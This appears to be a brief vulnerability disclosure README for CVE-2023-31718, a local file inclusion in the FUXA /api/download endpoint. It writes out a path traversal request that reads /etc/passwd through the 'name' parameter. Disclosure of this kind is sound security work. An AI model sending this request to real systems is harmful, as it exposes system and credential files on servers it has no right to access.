# CVE-2023-31718
Its possible to include local files into the endpoint /api/download. This endpoint is to download reports from the FUXA and can read local files from HTTP GET "name" parameter.
/api/download?cmd=REPORT-DOWNLOAD&name=../../../../../../etc/passwd
Name Affected product: FUXA
Version affected: <= 1.1.12
Problem: Local File Inclusion
Description: It's possible to include local files into the endpoint /api/download. This endpoint is to download reports from the FUXA and can read local files from HTTP GET "name" parameter /api/download?cmd=REPORT-DOWNLOAD&name=../../../../../../etc/passwd
[4.0K] /data/pocs/254f8f3a3c3f6e0841fde8be2e05bea5ef3c7ca4
└── [ 613] README.md
0 directories, 1 file